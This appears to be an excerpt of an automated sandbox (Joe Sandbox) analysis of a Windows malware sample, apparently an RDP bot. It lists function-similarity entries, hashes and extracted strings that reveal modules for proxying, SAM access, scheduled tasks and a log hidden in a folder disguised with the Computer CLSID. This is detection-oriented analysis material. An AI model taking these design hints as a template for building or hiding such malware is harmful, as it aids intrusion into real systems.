                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                                                                                                                  • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                                                                                                                  • API String ID: 2278979430-4175654481
                                                                                                                  • Opcode ID: 7ffc1b42ffd8632f2ed1fbe589379d6f427be0c6db0bcd8f1fd1e9e11f752cc3
                                                                                                                  • Instruction ID: 6ef686c52b1cc453d9935f16f4de786d92ba397e61908ed5ff240ba985f26d86
                                                                                                                  • Opcode Fuzzy Hash: 7ffc1b42ffd8632f2ed1fbe589379d6f427be0c6db0bcd8f1fd1e9e11f752cc3
                                                                                                                  • Instruction Fuzzy Hash: A251E432A08E5689EB20DF16EC503B97261AF447B4F1803B1D97D076F9EFBDA8458B40
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                                                                  • API String ID: 1004003707-636894343
                                                                                                                  • Opcode ID: 3d1f922fa46d15258c7b81ca59b01e3f4f63ff1320d8409a16869e9ac37485a9
                                                                                                                  • Instruction ID: 1809b26a26c189f83a8f4cb081c16d2f8cef37558739fd430bda4ae94c19dd2f
                                                                                                                  • Opcode Fuzzy Hash: 3d1f922fa46d15258c7b81ca59b01e3f4f63ff1320d8409a16869e9ac37485a9
                                                                                                                  • Instruction Fuzzy Hash: 97413961B0CF4795FA508B0AEA407FC2260BB16BA9F8851F7EB4D065B5DF3CA655C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                                                                  • API String ID: 1004003707-636894343
                                                                                                                  • Opcode ID: f6b184bf47517777e27bbaaa4bdcafcc134209ccac4664c9ce8d37e01970d3a7
                                                                                                                  • Instruction ID: 7c353e3ba476283a1aa02fccf34a64c75f230c5e81808dccb0a5b9e1a97f22ca
                                                                                                                  • Opcode Fuzzy Hash: f6b184bf47517777e27bbaaa4bdcafcc134209ccac4664c9ce8d37e01970d3a7
                                                                                                                  • Instruction Fuzzy Hash: EF410B65E48E9795FB108F82AC023FA6268BB44368F8955B2DA5D062B5EF3CF945C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                                                                                  • API String ID: 1004003707-4168131722
                                                                                                                  • Opcode ID: 200db34d868ae22f615fe2cb7234150327386c8e163d3b97334c3f0f365d0a91
                                                                                                                  • Instruction ID: b17fb35071a02cb5b6b81c2100e39e19c20e62f1704a0388408fb5d45d67e3dc
                                                                                                                  • Opcode Fuzzy Hash: 200db34d868ae22f615fe2cb7234150327386c8e163d3b97334c3f0f365d0a91
                                                                                                                  • Instruction Fuzzy Hash: AB413A61B0DF4799FA108B4AEA403FC2260AB12BA9F4451F7EB0D0A9B5DF3DB555C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                                                                                  • API String ID: 1004003707-4168131722
                                                                                                                  • Opcode ID: 0e0f18d63ba03ef00a4ee5e6d0c7fc764c1628c0adc18eaf3918b519abf3f823
                                                                                                                  • Instruction ID: 879cfb8898a7fa752b27866a31cd093238887839bb9dcaf3a275c61fc111e022
                                                                                                                  • Opcode Fuzzy Hash: 0e0f18d63ba03ef00a4ee5e6d0c7fc764c1628c0adc18eaf3918b519abf3f823
                                                                                                                  • Instruction Fuzzy Hash: 1D413B62E48E8795FF108B82ED403B66368BB40368F8454B6EA1D161B1EF3CF946C340
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                  • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                  • API String ID: 285244410-4028107517
                                                                                                                  • Opcode ID: 51182e06d6a6c07dd0c69d8f58770b2ddf4b90986f4ad3826cd256bf4d6556e1
                                                                                                                  • Instruction ID: 23b2f6fded784e6e7fd6d1f798ff41a460e9089ac7adefe450a44d8cb011467a
                                                                                                                  • Opcode Fuzzy Hash: 51182e06d6a6c07dd0c69d8f58770b2ddf4b90986f4ad3826cd256bf4d6556e1
                                                                                                                  • Instruction Fuzzy Hash: 6431F860A0ED43C1EF399F27E850EB82269AF40B78F4860B5D84D073B0EF2DE9458300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                  • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                  • API String ID: 285244410-4028107517
                                                                                                                  • Opcode ID: 1fdef6017acd4eadc507ca945bc6e3cc2d7f989b2ba6436f0cb6a46bc0386b84
                                                                                                                  • Instruction ID: cc4fbd2ba5b9331dde74d5eb557179590991ecdcf6f1f891b6479797687edb95
                                                                                                                  • Opcode Fuzzy Hash: 1fdef6017acd4eadc507ca945bc6e3cc2d7f989b2ba6436f0cb6a46bc0386b84
                                                                                                                  • Instruction Fuzzy Hash: 8F310A61F0DE1381FA109B0BE9407BD2661AF52FB5F58A4F7C94D1B2B0EE3CA9558300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                  • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                  • API String ID: 285244410-4028107517
                                                                                                                  • Opcode ID: 8ec8188f99a1aa25ad3b08fcfe056561c71c8757641c3a94cbd517e3ed549982
                                                                                                                  • Instruction ID: 104f7a2656d5c51aa5e70f9d279ef9269b5f3c7545f7de2fc30a234361dcbc4b
                                                                                                                  • Opcode Fuzzy Hash: 8ec8188f99a1aa25ad3b08fcfe056561c71c8757641c3a94cbd517e3ed549982
                                                                                                                  • Instruction Fuzzy Hash: 48310A61B0DD46C1FA258B47E8806792362FF96FB4F5844FBC84D07AB1EE2CE8459360
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                  • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                  • API String ID: 285244410-4028107517
                                                                                                                  • Opcode ID: 95a5f0df4977a900e9c23a46bbbbec40125fbf8d14d65270acb87fda012b2c4b
                                                                                                                  • Instruction ID: 34ee8cf7fcc4c06e930cf4f08cf8f534cdda8eef1b9a615a2f8246792f8b38c0
                                                                                                                  • Opcode Fuzzy Hash: 95a5f0df4977a900e9c23a46bbbbec40125fbf8d14d65270acb87fda012b2c4b
                                                                                                                  • Instruction Fuzzy Hash: 44311C61E09E1381FB119B87ECA03B8366AAF50BB4F5850B9C94D1B6B0EF6DE945C301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                  • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                  • API String ID: 285244410-4028107517
                                                                                                                  • Opcode ID: d7eaba8990d9bb82a883ab9eac106acf4eb305b5d3dced1ada31524724a4bca5
                                                                                                                  • Instruction ID: 6924f338594ddcf80a59e0a6c7b8134697ea9d379810d5aa05970ff0fd0a9ac9
                                                                                                                  • Opcode Fuzzy Hash: d7eaba8990d9bb82a883ab9eac106acf4eb305b5d3dced1ada31524724a4bca5
                                                                                                                  • Instruction Fuzzy Hash: A13105A1E0DE0381FF109B97EC503762369AF41BA4F9895B5C94E0B2B0EE2CF945D340
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                                                                                  • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                                                                                                                  • API String ID: 3179112426-3318474754
                                                                                                                  • Opcode ID: 62679cb6203fdb9ce5ed245b295c2cc3eaac5c932b8f41fb294838f1a43f0853
                                                                                                                  • Instruction ID: c8841fd074df91db8b42ba678752104f75a3a4f48eca73b025b0ac0ee58f5b7b
                                                                                                                  • Opcode Fuzzy Hash: 62679cb6203fdb9ce5ed245b295c2cc3eaac5c932b8f41fb294838f1a43f0853
                                                                                                                  • Instruction Fuzzy Hash: 8931A454E0DE07E1FF384F3798C0BF8625C9B0A7B9F5161B6C50E461B1DE6DA8849345
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                                                                                  • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                                                                                                                  • API String ID: 3179112426-2019511216
                                                                                                                  • Opcode ID: 5236b7cafe3e81f03fa3fcf6ea0a404faa5786d7186034cc21a0b78ad4f40b1b
                                                                                                                  • Instruction ID: 408b9f8b9df0c22e9e9936db1930176e84aa902b1983ca09415d6096e6aeff44
                                                                                                                  • Opcode Fuzzy Hash: 5236b7cafe3e81f03fa3fcf6ea0a404faa5786d7186034cc21a0b78ad4f40b1b
                                                                                                                  • Instruction Fuzzy Hash: 0031EB10F0DE0381FB61979A94E43BE127A9F44374F2005BAC55E462B9BE5EA999C382
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$strcpy
                                                                                                                  • String ID: *$schtasks
                                                                                                                  • API String ID: 2790333442-2394224502
                                                                                                                  • Opcode ID: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
                                                                                                                  • Instruction ID: 395646837e5e64cf676b35577a8927af8941720aff268b8ac49ecc60cf689f4e
                                                                                                                  • Opcode Fuzzy Hash: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
                                                                                                                  • Instruction Fuzzy Hash: 9C51A612B0CE8345FB616B97EC503BB5659AB853A4FD810B5EA4E473E6EE2CF904C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                                                                                                                  • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                                                                                                                  • API String ID: 3537583691-1494920791
                                                                                                                  • Opcode ID: 87de16ef6bca2d18c87270835ec864a3ef1168e45208d2f4b5260ae955c6280e
                                                                                                                  • Instruction ID: 107e93b4158e2a6c11c226bedfdd5798f5d7d1143fed92a80b68dad4051f4ac2
                                                                                                                  • Opcode Fuzzy Hash: 87de16ef6bca2d18c87270835ec864a3ef1168e45208d2f4b5260ae955c6280e
                                                                                                                  • Instruction Fuzzy Hash: 35416A62A08E4295EB10CF12EC543BA37A0EB48BA8F5441B5D94D477E8EFBCE559C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                                                                                                                  • API String ID: 513531256-4171087551
                                                                                                                  • Opcode ID: 28729dc196237c3a5edda3b9aee5b2e910e9e2580ecbd5e398dc6ed96b28f2b5
                                                                                                                  • Instruction ID: 16ed509116364ca5f9712a07da483093a6a5db660edc45876c2739817600c5b9
                                                                                                                  • Opcode Fuzzy Hash: 28729dc196237c3a5edda3b9aee5b2e910e9e2580ecbd5e398dc6ed96b28f2b5
                                                                                                                  • Instruction Fuzzy Hash: 0C416F75A0868586F320FF14E865BADE290BB847A0FC44037DE0D57796CFBEA551C720
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
